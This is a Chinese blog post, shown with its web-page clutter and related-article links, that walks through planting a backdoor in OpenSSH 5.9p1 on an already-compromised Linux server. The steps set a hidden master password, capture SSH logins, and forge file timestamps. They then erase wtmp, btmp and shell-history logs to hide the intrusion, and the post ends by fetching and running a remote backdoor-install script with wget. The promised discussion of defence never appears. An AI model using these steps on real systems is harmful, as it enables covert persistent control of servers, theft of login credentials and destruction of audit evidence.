linux安装openssh 密码错误,Linux安装openssh的后门补丁

最新推荐文章于 2023-03-19 10:15:09 发布
最新推荐文章于 2023-03-19 10:15:09 发布
阅读量258 收藏
点赞数
文章标签: linux安装openssh 密码错误

相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测,本文就如何添加OpenSSH后门以及防范后门添加进行探讨。

1,补丁下载:

2,解压后文件修改记录日志及密码

# cd openssh-5.9p1

# openssl rand 6 -base64 随机生成密码

h7SWmK1V

# vim includes.h

#define ILOG "/tmp/ilog" 修改为空

#define OLOG "/tmp/olog" 修改为空

#define SECRETPW "system" 修改需要登录的密码h7SWmK1V

3,安装相关依赖

#yum install openssl openssl-devel pam-devel -y

4,备份原有配置文件

#cp -p /etc/ssh/sshd_config{,.bak}

5,编译安装

#./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5 && make && make install

6,恢复之前文件的创建时间

# cd /etc/ssh/

#touch -r sshd_config.bak ssh_config

7,重载登录

#service sshd reload

8,删除记录

删除ssh补丁包

# rm -rf openssh-5.9p1*

删除部分记录

#echo ""> /var/log/wtmp

#echo ""> /var/log/btmp

#echo ""> ./.bash_history

删除或者隐藏原本sshd配置文件

#mv sshd_config.bak .sshd_config.bak

脚本安装:

#wget https://raw.githubusercontent.com/yeohZhou/neiwang/master/sshBackdoorinsatll.sh --no-check

#mv sshBackdoorinsatll.sh/var/tmp/

#cd/var/tmp#chmod+x sshBackdoorinsatll.sh#ssh-V#./sshBackdoorinsatll.shOpenSSH_4.3p2#/etc/init.d/sshd restart

年近半百
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux升级openssh提示密码错误,关于linux升级openssh须知
weixin_39936086的博客
05-01 2133
环境介绍:首先模拟环境为vmware下CentOS7,镜像方面为7.4的minimal版本也就是无任何附加软件。由于openssl是一个非常基础的软件所以会有众多软件依赖于openssl安装升级一个新版本的openssl会导致覆盖掉原操作系统的openssl,这会导致曾经依赖于openssl的软件功能变得不可用。具体流程:查看操作系统版本:[root@localhost ~]# cat /etc...
OpenSSH升级】无论密码输入正确与否总是登录失败(error: Could not get shadow information for root)
刘元林的博客
03-20 7197
所以selinux拒绝这样做。目标策略只允许unix_chkpwd (chkpwd_t)和unix_update (updpwd_t)程序读取/etc/shadow。这个模块首先尝试直接读取/etc/shadow。如果权限被拒绝,则执行/sbin/unix_chkpwd。参考链接:https://access.redhat.com/solutions/46137。启动UsePAM yes,由pam_unix去读取shadow文件。接受用户名和密码,并向pam_unix指示密码是否与用户名匹配。
linux升级openssh提示密码错误,升级openssh版本到8.2后,ssh登录出现Key exchange failed错误...
weixin_39990558的博客
05-01 3117
系统版本:centos7.4openssh版本:[root@localhost ~]# rpm -qa|grep opensshopenssh-server-8.2p1-1.el7.centos.x86_64openssh-8.2p1-1.el7.centos.x86_64openssh-clients-8.2p1-1.el7.centos.x86_64openssh-debuginfo-8.2p...
openssh 登录报错所走过的坑~~~Password authentication failed
hedao0515的专栏
03-19 2119
openssh 登录报错所走过的坑~~~Password authentication failed
高级运维工程师教你银河麒麟V10SP1高级服务器版本离线RPM方式升级openssl openssh 自动化升级系统补丁实战实例全网唯一
热门推荐
nasen512的博客
03-09 1万+
银河麒麟V10SP1离线RPM安装包自动化升级系统补丁至2023年3月
麒麟Linux升级openssh-9.7p1脚本
最新发布
03-21
进入openssh目录 修改脚本权限 chmod 777 update_ssh.sh 运行脚本就可以升级openssh至9.7 如果报错,先对脚本进行转码:dos2unix openssh/update_ssh.sh 在运行脚本 操作系统: Operating System:Kylin Linux ...
linuxOpenSSH后门获取root密码及防范
08-05
linux后门
openssh9.6p1离线安装rpm包
02-27
Linux系统中,尤其是CentOS 7.X系列,OpenSSH是一个至关重要的组件,它提供了安全的远程登录和其他网络服务。OpenSSH 9.6p1是该软件的最新版本,包含了许多性能提升、新功能以及对安全漏洞的修复。本文将详细介绍...
Linux修改openssh版本号.txt
10-20
Linux修改openssh版本号
linux升级openSSH详细步骤说明
10-27
Linux系统中,OpenSSH是安全的Shell (SSH)协议实现,用于远程登录和其他网络服务。随着技术的发展,OpenSSH会定期发布新版本以修复安全漏洞和增加新特性。本教程将详细介绍如何在CentOS 7系统上将OpenSSH升级到8.8...
openssh-5.9p1后门补丁
08-08
openssh-5.9p1后门补丁
LinuxOpenSSH8.3p1补丁包20200908.zip
09-08
补丁包包含了升级所需的3个压缩文件及操作步骤,按照升级文件上的步骤操作就可以把redhat的openssh版本升级到openssh8.3p1。
三种常用的打补丁方法
01-27
三种常用的打补丁方法简介
给系统打补丁升级漏洞,俗称服务升级,自己心得篇
mingqing的博客
12-20 3901
文章目录需要升级的服务,tomcat、nginx、openssh需要准备环境升级案例一 nginx升级查看tomcat版本先停止服务打包现有Tomcat目录下logs和webapps目录备份现有Tomcat目录准备tomcat最新版war包,没有去官网下载上传Tomcat安装包并解压环境变量我这里没有配置,因为上面老版本已经配置啦迁移原项目及日志再进入新版的tomcat下面启动验证查看版本如果有需要改端口可以进行修改升级案例二 openssh升级安装telnet配置telnet登录的终端类型,在/etc/s
openssh升级后root_CentOS 升级 openSSH+ sh脚本自动运维 - 四海骄阳
weixin_39860946的博客
11-10 380
https://www.cnblogs.com/yybrhr/p/9682129.html openSSH作为linux远程连接工具,容易受到攻击,必须更新版本来解决,低版本有如下等漏洞:   OpenSSH 远程代码执行漏洞(CVE-2016-10009) OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515) ...
openssh 升级后ssh远程登录报错Permission denied, please try again.
石宗昊的博客
10-19 4318
报错一般以下报错是密码错误,但是最近我升级了openssh,权限没给对导致的远程连接失败。我对ssh的配置文件进行了以下修改。
centos ssh升级到OpenSSH_8.5p1后无法登录,密码输入正确仍然无法登录已解决
醉世老翁的博客
06-11 4225
ssh配置文件需要开启sang: PermitRootLogin yes PubkeyAuthentication yes PasswordAuthentication yes
linux openssh密码错误,OpenSSH普通用户无法登录的几种情况的解决办法
weixin_29967445的博客
04-30 1738
OpenSSH普通用户无法登录的几种情况的解决方法原帖:http://www.linuxidc.com/Linux/2012-05/59457.htm1 验证方式不支持如客户端登录时提示如下:[www.linuxidc.com@CentOS-6-37 ~]$ ssh monitor@192.168.1.5Permission denied (publickey,keyboard-interacti...
linux openssh密码错误,Ubuntu Linux中ssh错误
weixin_31951365的博客
04-30 330
服务器启动时:couldnotloadhostkey/etc/ssh/ssh_host_rsa_key客户端连接时,总提示‘Readfromsocketfailed:Connectionresetbypeer’:xiaogw@R715:/tftpboot/xiaogw$ssh-vvv192.168.1.2OpenSSH_5.3p1Debian-3ubuntu7,O...
linux安装openssh
03-16
要在Linux系统上安装OpenSSH,需要使用系统包管理器。在不同的发行版中,可能需要使用不同的命令。 在Debian/Ubuntu系统上,可以使用以下命令安装OpenSSH: ``` sudo apt-get install openssh-server ``` 在CentOS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值